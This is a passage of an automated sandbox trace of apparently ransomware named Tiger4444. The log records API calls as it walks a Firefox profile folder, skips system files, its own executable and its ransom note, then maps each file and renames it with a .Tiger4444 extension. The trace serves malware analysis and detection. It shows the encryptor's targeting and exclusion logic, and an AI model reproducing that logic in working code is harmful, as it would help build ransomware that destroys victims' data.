RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0050.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9c) returned 0xc611e0 [0050.626] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc666a8 [0050.626] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c4b15, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40c5e7c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp-gmpopenh264", cAlternateFileName="GMP-GM~1")) returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="Tiger4444.exe") returned -1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2=".") returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="..") returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="windows") returned -1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="bootmgr") returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="pagefile.sys") returned -1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="boot") returned 1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="ids.txt") returned -1 [0050.626] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="NTUSER.DAT") returned -1 [0050.626] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="gmp-gmpopenh264" | out: lpString1="gmp-gmpopenh264") returned="gmp-gmpopenh264" [0050.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0050.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb4) returned 0xc5f6a8 [0050.627] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc665c8 [0050.627] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5af7cc2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp-widevinecdm", cAlternateFileName="GMP-WI~1")) returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="Tiger4444.exe") returned -1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2=".") returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="..") returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="windows") returned -1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="bootmgr") returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="pagefile.sys") returned -1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="boot") returned 1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="ids.txt") returned -1 [0050.627] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="NTUSER.DAT") returned -1 [0050.627] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="gmp-widevinecdm" | out: lpString1="gmp-widevinecdm") returned="gmp-widevinecdm" [0050.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0050.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb4) returned 0xc5fd10 [0050.627] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66608 [0050.627] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2edfb3e, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2edfb3e, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x2ee0ebb, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="handlers.json", cAlternateFileName="HANDLE~1.JSO")) returned 1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="Tiger4444.exe") returned -1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2=".") returned 1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="..") returned 1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="windows") returned -1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="bootmgr") returned 1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="pagefile.sys") returned -1 [0050.627] lstrcmpiW (lpString1="handlers.json", lpString2="boot") returned 1 [0050.628] lstrcmpiW (lpString1="handlers.json", lpString2="ids.txt") returned -1 [0050.628] lstrcmpiW (lpString1="handlers.json", lpString2="NTUSER.DAT") returned -1 [0050.628] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="handlers.json" | out: lpString1="handlers.json") returned="handlers.json" [0050.628] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json", dwFileAttributes=0x0) returned 1 [0050.628] lstrlenW (lpString="handlers.json") returned 13 [0050.628] lstrlenW (lpString="Tiger4444") returned 9 [0050.628] lstrcmpiW (lpString1="lers.json", lpString2="Tiger4444") returned -1 [0050.628] lstrlenW (lpString=".dll") returned 4 [0050.628] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.628] lstrlenW (lpString=".lnk") returned 4 [0050.628] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.628] lstrlenW (lpString=".ini") returned 4 [0050.628] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.628] lstrlenW (lpString=".sys") returned 4 [0050.628] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.628] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.629] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.629] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14208172149) returned 1 [0050.629] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=683) returned 1 [0050.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0050.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0050.629] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b0, lpName=0x0) returned 0x2c8 [0050.630] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b0) returned 0xbe0000 [0050.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0050.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0050.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.636] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14208902959) returned 1 [0050.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0050.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0050.636] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.636] CloseHandle (hObject=0x2c8) returned 1 [0050.636] CloseHandle (hObject=0x260) returned 1 [0050.636] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json.Tiger4444") returned 97 [0050.636] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\handlers.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\handlers.json.tiger4444"), dwFlags=0x1) returned 1 [0050.637] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe6922fa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe6922fa, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="Tiger4444.exe") returned -1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2=".") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="..") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="windows") returned -1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="bootmgr") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="pagefile.sys") returned -1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="boot") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="ids.txt") returned 1 [0050.637] lstrcmpiW (lpString1="key3.db", lpString2="NTUSER.DAT") returned -1 [0050.637] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="key3.db" | out: lpString1="key3.db") returned="key3.db" [0050.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db", dwFileAttributes=0x0) returned 1 [0050.638] lstrlenW (lpString="key3.db") returned 7 [0050.638] lstrlenW (lpString="Tiger4444") returned 9 [0050.638] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0050.638] lstrlenW (lpString=".dll") returned 4 [0050.638] lstrcmpiW (lpString1="3.db", lpString2=".dll") returned 1 [0050.638] lstrlenW (lpString=".lnk") returned 4 [0050.638] lstrcmpiW (lpString1="3.db", lpString2=".lnk") returned 1 [0050.638] lstrlenW (lpString=".ini") returned 4 [0050.638] lstrcmpiW (lpString1="3.db", lpString2=".ini") returned 1 [0050.638] lstrlenW (lpString=".sys") returned 4 [0050.638] lstrcmpiW (lpString1="3.db", lpString2=".sys") returned 1 [0050.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.638] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.638] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14209154092) returned 1 [0050.638] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=16384) returned 1 [0050.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0050.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0050.639] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x2c8 [0050.640] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0xbe0000 [0050.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.645] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14209794389) returned 1 [0050.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0050.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0050.645] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.645] CloseHandle (hObject=0x2c8) returned 1 [0050.645] CloseHandle (hObject=0x260) returned 1 [0050.645] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db.Tiger4444") returned 91 [0050.645] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\key3.db.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\key3.db.tiger4444"), dwFlags=0x1) returned 1 [0050.646] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="Tiger4444.exe") returned -1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="windows") returned -1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="bootmgr") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="pagefile.sys") returned -1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="boot") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="ids.txt") returned 1 [0050.646] lstrcmpiW (lpString1="minidumps", lpString2="NTUSER.DAT") returned -1 [0050.646] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="minidumps" | out: lpString1="minidumps") returned="minidumps" [0050.646] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0050.646] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa8) returned 0xc87ad8 [0050.646] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66348 | out: ListHead=0xc66828, ListEntry=0xc66348) returned 0xc66628 [0050.646] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x6f2e0a0, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="Tiger4444.exe") returned -1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2=".") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="..") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="windows") returned -1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="bootmgr") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="pagefile.sys") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="boot") returned 1 [0050.646] lstrcmpiW (lpString1="parent.lock", lpString2="ids.txt") returned 1 [0050.647] lstrcmpiW (lpString1="parent.lock", lpString2="NTUSER.DAT") returned 1 [0050.647] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="parent.lock" | out: lpString1="parent.lock") returned="parent.lock" [0050.647] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\parent.lock", dwFileAttributes=0x0) returned 1 [0050.647] lstrlenW (lpString="parent.lock") returned 11 [0050.647] lstrlenW (lpString="Tiger4444") returned 9 [0050.647] lstrcmpiW (lpString1="rent.lock", lpString2="Tiger4444") returned -1 [0050.648] lstrlenW (lpString=".dll") returned 4 [0050.648] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0050.648] lstrlenW (lpString=".lnk") returned 4 [0050.648] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0050.648] lstrlenW (lpString=".ini") returned 4 [0050.648] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0050.648] lstrlenW (lpString=".sys") returned 4 [0050.648] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0050.648] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd67a0d8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd67a0d8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd7d1832, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Tiger4444.exe") returned -1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2=".") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="..") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="windows") returned -1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="bootmgr") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="pagefile.sys") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="boot") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ids.txt") returned 1 [0050.648] lstrcmpiW (lpString1="permissions.sqlite", lpString2="NTUSER.DAT") returned 1 [0050.648] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="permissions.sqlite" | out: lpString1="permissions.sqlite") returned="permissions.sqlite" [0050.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite", dwFileAttributes=0x0) returned 1 [0050.649] lstrlenW (lpString="permissions.sqlite") returned 18 [0050.649] lstrlenW (lpString="Tiger4444") returned 9 [0050.649] lstrcmpiW (lpString1="ns.sqlite", lpString2="Tiger4444") returned -1 [0050.649] lstrlenW (lpString=".dll") returned 4 [0050.649] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.649] lstrlenW (lpString=".lnk") returned 4 [0050.649] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.649] lstrlenW (lpString=".ini") returned 4 [0050.649] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.649] lstrlenW (lpString=".sys") returned 4 [0050.649] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.649] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.649] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.649] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14210222189) returned 1 [0050.649] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=98304) returned 1 [0050.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0050.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0050.649] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x2c8 [0050.650] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0xbe0000 [0050.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0050.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0050.661] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14211412803) returned 1 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0050.661] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0050.661] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.662] CloseHandle (hObject=0x2c8) returned 1 [0050.662] CloseHandle (hObject=0x260) returned 1 [0050.662] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite.Tiger4444") returned 102 [0050.662] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\permissions.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\permissions.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0050.663] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd54ecc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdd54ecc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x42fefdeb, 